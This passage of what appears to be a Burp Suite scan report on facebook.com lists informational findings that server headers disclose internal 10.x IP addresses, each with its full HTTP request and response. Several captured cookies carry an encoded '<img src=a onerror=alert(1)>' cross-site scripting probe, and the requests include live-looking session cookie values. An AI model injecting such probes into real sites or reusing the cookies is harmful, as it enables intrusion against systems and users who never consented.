GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df10e19524%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1c1d15cfc%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df12b93ec04%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1c1d15cfc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df25b8338e%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df853f0e2c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1c1d15cfc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df25b8338e&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1ba0f78a8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1c1d15cfc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df25b8338e&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df5a1429bc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1c1d15cfc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df25b8338e&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f1ba0f78a8&origin=http%3A%2F%2Faol.sportingnews.com%2Ff1c1d15cfc&relation=parent&transport=postmessage&frame=f25b8338e
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.99.85
X-Cnection: close
Date: Thu, 05 May 2011 01:04:18 GMT
Content-Length: 0


20.183. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.42.77.55

Request

GET /extern/login_status.php?api_key=113402378708388&app_id=113402378708388&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df16981bfec%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff345970418%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2033686f%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff345970418%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df20e0837e%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df220f88964%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff345970418%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df20e0837e&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2e76da78%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff345970418%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df20e0837e&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1810035c4%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff345970418%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df20e0837e&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f2e76da78&origin=http%3A%2F%2Ftechcrunch.com%2Ff345970418&relation=parent&transport=postmessage&frame=f20e0837e
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.77.55
X-Cnection: close
Date: Thu, 05 May 2011 01:19:26 GMT
Content-Length: 0


20.184. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.242.41

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3463475b8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2fc70151%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3763ee51%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2fc70151%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df23183f85%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3fcbb4c2c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2fc70151%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df23183f85&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df364352c08%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2fc70151%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df23183f85&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3991cd268%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2fc70151%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df23183f85&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f364352c08&origin=http%3A%2F%2Faol.sportingnews.com%2Ff2fc70151&relation=parent&transport=postmessage&frame=f23183f85
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.242.41
X-Cnection: close
Date: Thu, 05 May 2011 01:44:32 GMT
Content-Length: 0


20.185. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.136.109.110

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df493a8d9c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1d597cdc8%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2cfe5b4cc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1d597cdc8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df11b7ba594%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfcd1ed894%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1d597cdc8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df11b7ba594&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df8066206%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1d597cdc8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df11b7ba594&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df15cb9af84%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1d597cdc8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df11b7ba594&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f8066206&origin=http%3A%2F%2Faol.sportingnews.com%2Ff1d597cdc8&relation=parent&transport=postmessage&frame=f11b7ba594
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.109.110
X-Cnection: close
Date: Thu, 05 May 2011 02:00:00 GMT
Content-Length: 0


20.186. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.54.205.40

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df202c4acb4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2e3203268%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df359b7a35%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2e3203268%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df25c4a10b8%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1fa7b6bc4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2e3203268%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df25c4a10b8&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df901bc4ac%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2e3203268%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df25c4a10b8&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1b78e2d58%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2e3203268%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df25c4a10b8&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f901bc4ac&origin=http%3A%2F%2Faol.sportingnews.com%2Ff2e3203268&relation=parent&transport=postmessage&frame=f25c4a10b8
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.205.40
X-Cnection: close
Date: Thu, 05 May 2011 01:54:28 GMT
Content-Length: 0


20.187. http://www.facebook.com/facebook

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /facebook

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.157.59

Request

GET /facebook HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.157.59
Connection: close
Date: Thu, 05 May 2011 11:43:00 GMT
Content-Length: 159754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

20.188. http://www.facebook.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.37.21.104

Request

GET /favicon.ico HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=xCqlG; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: image/x-icon
Expires: Sat, 04 Jun 2011 02:51:05 GMT
X-FB-Server: 10.37.21.104
X-Cnection: close
Date: Thu, 05 May 2011 02:51:05 GMT
Content-Length: 152


20.189. http://www.facebook.com/fayse

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /fayse

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.139.21

Request

GET /fayse HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffayse; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.139.21
Connection: close
Date: Thu, 05 May 2011 11:42:45 GMT
Content-Length: 59713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

20.190. http://www.facebook.com/find-friends

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /find-friends

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.188.21

Request

GET /find-friends?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpolicy.php; act=1304613654644%2F1; _e_nXwy_0=%5B%22nXwy%22%2C1304613654661%2C%22act%22%2C1304613654644%2C1%2C%22http%3A%2F%2Fwww.facebook.com%2Fmobile%3Fref%3Dpf%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fr.php%3Fprofile_id%3D100000824820783%26next%3Dhttp%253A%252F%252Fwww.facebook.com%252Fprofile.php%253Fid%253D100000824820783%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C361%2C635%2C12%2C981%2C16%5D

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends%3Fref%3Dpf; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.188.21
X-Cnection: close
Date: Thu, 05 May 2011 11:43:46 GMT
Content-Length: 101594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.191. http://www.facebook.com/find-friends

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /find-friends

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.166.37

Request

GET /find-friends?ref=pf HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.166.37
Connection: close
Date: Thu, 05 May 2011 11:42:55 GMT
Content-Length: 101670

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.192. http://www.facebook.com/find-friends

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /find-friends

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.184.27

Request

GET /find-friends HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.184.27
Connection: close
Date: Thu, 05 May 2011 11:42:55 GMT
Content-Length: 101636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.193. http://www.facebook.com/find-friends

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /find-friends

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.32.218.112

Request

GET /find-friends HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.218.112
Connection: close
Date: Thu, 05 May 2011 10:56:37 GMT
Content-Length: 101636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.194. http://www.facebook.com/gale.l.schenk

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /gale.l.schenk

Issue detail

The following RFC 1918 IP address was disclosed in the response:
